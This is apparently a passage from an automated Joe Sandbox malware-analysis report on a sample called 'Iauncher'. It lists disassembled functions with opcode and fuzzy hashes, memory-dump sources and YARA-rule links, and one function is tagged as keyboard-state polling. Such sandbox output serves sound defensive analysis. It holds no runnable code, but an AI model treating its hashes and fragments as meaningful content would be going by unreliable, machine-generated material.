                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: e71a4205c42b6357f9d21584303f2c3992dc667b49c31f2d14873ed4444a5750
                                                                                                                                                    • Instruction ID: 848d3e27b382d0a13dcbda8ce9444441b345c32f47e0392e2bb048802eb2bdd1
                                                                                                                                                    • Opcode Fuzzy Hash: e71a4205c42b6357f9d21584303f2c3992dc667b49c31f2d14873ed4444a5750
                                                                                                                                                    • Instruction Fuzzy Hash: 16E0DF323101189BC7108A6DF888CAAB7EAEBC8775B008077F608C7310CF71C802C790
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CA8E98 Relevance: .0, Instructions: 27COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 9d1a8ac1a305df60a606dca6d364733491a4f532d8d9c660778baa3521cf5fe4
                                                                                                                                                    • Instruction ID: 744e07ecfbfc96b012066df63b4591a173c6b2fbdba124dd3fa2e87eb7dacadd
                                                                                                                                                    • Opcode Fuzzy Hash: 9d1a8ac1a305df60a606dca6d364733491a4f532d8d9c660778baa3521cf5fe4
                                                                                                                                                    • Instruction Fuzzy Hash: 31E0C23620020DBBDF119E86DC40EDB7FADFB8D7A4F014101FE0866250C232A820EBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DDCE9E Relevance: .0, Instructions: 26COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684462828.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5dd0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b76efb86478ed585aa3c42f5ad032f6160e85d6d8c10c8dcfeb221de0f3c143d
                                                                                                                                                    • Instruction ID: 1d0d79b2d77942d314b3f9792f2969ef449ad3d18c9ac0e3e2e48e1e65ee69f1
                                                                                                                                                    • Opcode Fuzzy Hash: b76efb86478ed585aa3c42f5ad032f6160e85d6d8c10c8dcfeb221de0f3c143d
                                                                                                                                                    • Instruction Fuzzy Hash: 4BE0ED757101049FCB08CF5DD884DAEF7F5FB8C224B2140A9E519D7361E631DD05CA50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CA8510 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 88174059be14649e77e034e464523d97179b416af10f90c7d5b425cfade14785
                                                                                                                                                    • Instruction ID: 2901d3d43f4c33a8f1448484228ad9c3e6fea12a96037fd6a799ba23fb4c9a2b
                                                                                                                                                    • Opcode Fuzzy Hash: 88174059be14649e77e034e464523d97179b416af10f90c7d5b425cfade14785
                                                                                                                                                    • Instruction Fuzzy Hash: B3F0F839900108EFCF41DF94D944D99BFB6EB49300F148095EA0817271D7329AA6EB80
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DDD7F0 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684462828.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5dd0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: fab0e1f97cdf8bbf4ebd1d005d535071c226c02aeb48f419117d38c53816d2ed
                                                                                                                                                    • Instruction ID: 55f1ed43ff5b33a7f8460e6eee2f3dd743ca7d010582f9297ecb7443483d1588
                                                                                                                                                    • Opcode Fuzzy Hash: fab0e1f97cdf8bbf4ebd1d005d535071c226c02aeb48f419117d38c53816d2ed
                                                                                                                                                    • Instruction Fuzzy Hash: 94E086323003146BD7259649FC04F9FBBDEDBD8715F14412AF609CB291CAF5B90287A5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CA55D2 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 840d8f1334e80e354c6e25e83a5fe33c7422f7fbd6c31ebe9883c9fa3ca4bb5d
                                                                                                                                                    • Instruction ID: 62c6b0b2ad69512af710db6e118b61113aac63825a99d363157922ef6b170dc6
                                                                                                                                                    • Opcode Fuzzy Hash: 840d8f1334e80e354c6e25e83a5fe33c7422f7fbd6c31ebe9883c9fa3ca4bb5d
                                                                                                                                                    • Instruction Fuzzy Hash: 08F0E5709041449BC760CB68C480B58BFB0EB46320F2482EDDD544B382C6325E92CB81
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CA55E0 Relevance: .0, Instructions: 20COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 4d8416cf0f5bf261b0c2a45ae67e418c58ca49e09c35aad18e6291d635d62ee3
                                                                                                                                                    • Instruction ID: 06005c71518fcfb1830c36cdf7e75399dea0338caa70eebd702dc96a6e61d27e
                                                                                                                                                    • Opcode Fuzzy Hash: 4d8416cf0f5bf261b0c2a45ae67e418c58ca49e09c35aad18e6291d635d62ee3
                                                                                                                                                    • Instruction Fuzzy Hash: CAE01274900208EFC740DFA8D54465CBBB5EB48210F2081A9DD0893340D632AE91DB44
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DD9B20 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684462828.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5dd0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: c3d7b7fac01cf0b4c92a55e321620fd66d7e0f7121e5b6ac751e793cfc43dc86
                                                                                                                                                    • Instruction ID: da8c15707c0902efc85bc9bf3b1a0d83f89b51ac6ea5ebda11cab6d454f92ea1
                                                                                                                                                    • Opcode Fuzzy Hash: c3d7b7fac01cf0b4c92a55e321620fd66d7e0f7121e5b6ac751e793cfc43dc86
                                                                                                                                                    • Instruction Fuzzy Hash: 05D0A930A45208BBC640EBA48458B7AF33CDB03240F20259A860923290CAB26E40E2B8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CA6C22 Relevance: .0, Instructions: 15COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 275e40329b35cbc828d765cca1c7b7d365744b04c44ed8307bb023c94e8c4340
                                                                                                                                                    • Instruction ID: 6c241f3a6e02c930e01d8e0c8c3b143b831abf6ece65769a4ee00a2051a8d78d
                                                                                                                                                    • Opcode Fuzzy Hash: 275e40329b35cbc828d765cca1c7b7d365744b04c44ed8307bb023c94e8c4340
                                                                                                                                                    • Instruction Fuzzy Hash: BCD05EB290D184AAE7117EE8A581A5A3F319B54251F0584EBF484190AB9671403CD7D7
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CA6C30 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: edca50cb207e6ea5d5a1626f97f4fab3e31a1cbc54d521a5f86d6db2363aa66a
                                                                                                                                                    • Instruction ID: 70f019abf849caff963194aed9217c75f60b7682365fa95050573bbd5500c038
                                                                                                                                                    • Opcode Fuzzy Hash: edca50cb207e6ea5d5a1626f97f4fab3e31a1cbc54d521a5f86d6db2363aa66a
                                                                                                                                                    • Instruction Fuzzy Hash: 83C01271545108EADB003EE9A845A5E7F69AB08310F008466F9842616496B19138D6A7
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CA5AE8 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 411bb830ce5343d11185096dcc806f3d51e58e9c2381d20953b3a3e4aeba6bd7
                                                                                                                                                    • Instruction ID: f98b6d63e4f1400011ee0155286cb534c9d950e377214d56cd2ba1c8af692ca6
                                                                                                                                                    • Opcode Fuzzy Hash: 411bb830ce5343d11185096dcc806f3d51e58e9c2381d20953b3a3e4aeba6bd7
                                                                                                                                                    • Instruction Fuzzy Hash: 85C080706407885BF1142F94B448736325D5742216F508614731E055E0E5E59DD4D22F
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DDB948 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684462828.0000000005DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DD0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5dd0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: edb52f79437d5c5a029e2b9fc1d939fa2fb04facc6dcdf6b3dc23a8334716e96
                                                                                                                                                    • Instruction ID: 1c228e5ec4407ffe32c2c04467ff8ffca0b6a5b255b93d56046f15e58b509b73
                                                                                                                                                    • Opcode Fuzzy Hash: edb52f79437d5c5a029e2b9fc1d939fa2fb04facc6dcdf6b3dc23a8334716e96
                                                                                                                                                    • Instruction Fuzzy Hash: 29C02B1428834043C540F3940880759DA919F91300F90DC07E4884A241C010C807C733
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CA7310 Relevance: .0, Instructions: 9COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: a179f4697c04b77758c3e5ca584044fcc7aa30c02cc2a580d311af8a27d39747
                                                                                                                                                    • Instruction ID: b824616d933405bbe9efe3dac3aa6a5d0512faf47a9dfcbb28911cc540c78d44
                                                                                                                                                    • Opcode Fuzzy Hash: a179f4697c04b77758c3e5ca584044fcc7aa30c02cc2a580d311af8a27d39747
                                                                                                                                                    • Instruction Fuzzy Hash: 5BC0483600024EBBCF02AE81ED11D9A3F2AAB08260F00C415FE1908171A673D970FBA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CA898E Relevance: .0, Instructions: 8COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: f6bd19c40b1921fd5402dbeb5903b94da8af6717e85ad494350fe4ff122aa5e7
                                                                                                                                                    • Instruction ID: 098fc06f5c7cd077d30b70b8a6ab1ca45031a42c6c468d53f6839c5c61b185ec
                                                                                                                                                    • Opcode Fuzzy Hash: f6bd19c40b1921fd5402dbeb5903b94da8af6717e85ad494350fe4ff122aa5e7
                                                                                                                                                    • Instruction Fuzzy Hash: 48B09237E0400ACADB108A96B4453EDF760FB80369F104023C31052000C23201748692
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Non-executed Functions

                                                                                                                                                    Function 09BF2390 Relevance: 7.6, APIs: 5, Instructions: 115keyboardCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetKeyState.USER32(00000001), ref: 09BF23ED
                                                                                                                                                    • GetKeyState.USER32(00000002), ref: 09BF2432
                                                                                                                                                    • GetKeyState.USER32(00000004), ref: 09BF2477
                                                                                                                                                    • GetKeyState.USER32(00000005), ref: 09BF24BC
                                                                                                                                                    • GetKeyState.USER32(00000006), ref: 09BF2501
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687143886.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9bf0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: State
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1649606143-0
                                                                                                                                                    • Opcode ID: 41fc5220539446c6123c483d096c33643d4b1bec7cf0e31589e9c82e2ffeeeeb
                                                                                                                                                    • Instruction ID: af45cd545c64eb0e3031f185e8f4362808c562153cba179de3b250a2fb9c58be
                                                                                                                                                    • Opcode Fuzzy Hash: 41fc5220539446c6123c483d096c33643d4b1bec7cf0e31589e9c82e2ffeeeeb
                                                                                                                                                    • Instruction Fuzzy Hash: 4A41A271D007458EEB10DF59C5693AFBFF4BB04325F60845DD668B7280C3B9964ACBA2
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CA5BE8 Relevance: 1.6, Strings: 1, Instructions: 398COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: pq
                                                                                                                                                    • API String ID: 0-153521182
                                                                                                                                                    • Opcode ID: 60e05bd51df983c6a481a3eec184661083b97296358d61727b9605f3f51c78b1
                                                                                                                                                    • Instruction ID: 95ce5ce60fb8d8bfa6b5a7b11bf9049b204e88e4aae4c5a916a9490ddec97c8f
                                                                                                                                                    • Opcode Fuzzy Hash: 60e05bd51df983c6a481a3eec184661083b97296358d61727b9605f3f51c78b1
                                                                                                                                                    • Instruction Fuzzy Hash: 6302CF75A00218DFDB15CFA9D984E9DBBB2FF49304F1580A9E609AB236D731E991DF00
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CA9DC8 Relevance: .4, Instructions: 420COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 92c67bb0819d0550a030d7f1f91cda011e9968396f2176c17d49f7f4e7425ba2
                                                                                                                                                    • Instruction ID: 20c953f2e0aa78c3f3ea31e06d386940a418d0d1cfa8d25deefb8e716d71abf7
                                                                                                                                                    • Opcode Fuzzy Hash: 92c67bb0819d0550a030d7f1f91cda011e9968396f2176c17d49f7f4e7425ba2
                                                                                                                                                    • Instruction Fuzzy Hash: B3124835D10219CFDB10DF64C844BD9BBB1FF9A300F5182AAE5097B260EB70AA95CF41
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09CAF1A0 Relevance: .4, Instructions: 387COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687267930.0000000009CA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CA0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9ca0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 0dc3337f773d02a348e1d229fc566ce757d06923336142753ebd35e71f260820
                                                                                                                                                    • Instruction ID: e711849450e8a14ebd102e59df02af367ce3b92547c895add3ded303d1cabff7
                                                                                                                                                    • Opcode Fuzzy Hash: 0dc3337f773d02a348e1d229fc566ce757d06923336142753ebd35e71f260820
                                                                                                                                                    • Instruction Fuzzy Hash: 9F023934D10219DFDB10DF64C844BD9BBB1FF9A300F5182AAE549BB260EB709A95CF51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09BF97F0 Relevance: .3, Instructions: 349COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687143886.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9bf0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 297e90950b1b0c972263bf0f8b6eb0a362e5d8609a5d706c5ce6941d2935fdf9
                                                                                                                                                    • Instruction ID: 048ffb75201ba133f0dc51216c06aa1de1eb6449679cb98eed26fd9eaed881a7
                                                                                                                                                    • Opcode Fuzzy Hash: 297e90950b1b0c972263bf0f8b6eb0a362e5d8609a5d706c5ce6941d2935fdf9
                                                                                                                                                    • Instruction Fuzzy Hash: E1025E75E002698FDB60DF69C990BDDBBF1FF49310F1081AAE949A7250EB709A84CF50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05D6A940 Relevance: .3, Instructions: 337COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3683984827.0000000005D60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D60000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5d60000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: c3f53b83e0774d4c05a0556bcb6d450ec88a9e9b66b0d43c5a2ee25162aa5390
                                                                                                                                                    • Instruction ID: 12c8b14363919ae85974a1220d31eed145db8179b825f7b037af1348e8eada2a
                                                                                                                                                    • Opcode Fuzzy Hash: c3f53b83e0774d4c05a0556bcb6d450ec88a9e9b66b0d43c5a2ee25162aa5390
                                                                                                                                                    • Instruction Fuzzy Hash: E2E1C174E04218CBDB24DFB4D894BADBBB2FB49301F2091AAD45AB7391DB345982CF54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09BF97E0 Relevance: .3, Instructions: 315COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687143886.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9bf0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b40fc6e7f13407ec169a92b54414681119b3f871370d08a23ae39a9db0a3f0bc
                                                                                                                                                    • Instruction ID: 956ffb328e78fa4f27f0617ca89012ddc51bdfdbf03880cd981009a9b6f5dfb1
                                                                                                                                                    • Opcode Fuzzy Hash: b40fc6e7f13407ec169a92b54414681119b3f871370d08a23ae39a9db0a3f0bc
                                                                                                                                                    • Instruction Fuzzy Hash: 14F18D75E002298FDB60DF69C990BDDBBB1FF59310F1081AAE949B7250EB709A84CF50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05D8D8C1 Relevance: .3, Instructions: 268COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684118323.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5d80000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: c58e5b78860a1dba72943483afc76172f0df34ac38f81eba13f12540c354f01e
                                                                                                                                                    • Instruction ID: cfa1c46056aa60932b1838ffa96603f9ba6218e5f6dfaff84c754da634c0edea
                                                                                                                                                    • Opcode Fuzzy Hash: c58e5b78860a1dba72943483afc76172f0df34ac38f81eba13f12540c354f01e
                                                                                                                                                    • Instruction Fuzzy Hash: 91D1E735D2075A8ACB10EF68D990A99F7B1FF95300F20C79AE4197B214FB706AC5CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05D8D8D0 Relevance: .3, Instructions: 264COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684118323.0000000005D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D80000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5d80000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1dcb8909a2e573b9e701a4b747b7f8dfd0eceb4e6c16da4153e292b794c22dea
                                                                                                                                                    • Instruction ID: b6f60b24530159198ec40f53739a371f1715b360a6908abf8f14a78ac27aa02a
                                                                                                                                                    • Opcode Fuzzy Hash: 1dcb8909a2e573b9e701a4b747b7f8dfd0eceb4e6c16da4153e292b794c22dea
                                                                                                                                                    • Instruction Fuzzy Hash: 81D1E735D2075A8ACB10EF68D990A99F7B1FF95300F20C79AE4197B214FB706AC5CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 09BF253F Relevance: .1, Instructions: 110COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3687143886.0000000009BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_9bf0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 27ce419f15acee24ef7ff7297e971585dea0b8a0cf4a23aa89f7e5b71f50e539
                                                                                                                                                    • Instruction ID: ae1cb9e2e894201d803b0a966bf2012e0981922b66f1da5e44ff10034b3dc561
                                                                                                                                                    • Opcode Fuzzy Hash: 27ce419f15acee24ef7ff7297e971585dea0b8a0cf4a23aa89f7e5b71f50e539
                                                                                                                                                    • Instruction Fuzzy Hash: 06415430E002599FDB00DFE8D8A87EEBBB1FB49315F10416AE511AB394DB749989CF90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DB78F8 Relevance: .1, Instructions: 104COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.3684315895.0000000005DB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DB0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_5db0000_Iauncher.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 9ecd282a80144907692472c8a8877a68d80c1bc3a98daccb7b00acd0e9fae4ef
                                                                                                                                                    • Instruction ID: 0811ce5e1bbbdf0aad33591e2511948cd15b78e94c88e023f81320b05e7265c4
                                                                                                                                                    • Opcode Fuzzy Hash: 9ecd282a80144907692472c8a8877a68d80c1bc3a98daccb7b00acd0e9fae4ef
                                                                                                                                                    • Instruction Fuzzy Hash: D641E570E00219CFEB04DFA8D584BEEBBB2EB49301F10446AD412B7391D774AA45CBA5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 05DB7908 Relevance: .1, Instructions: 100COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
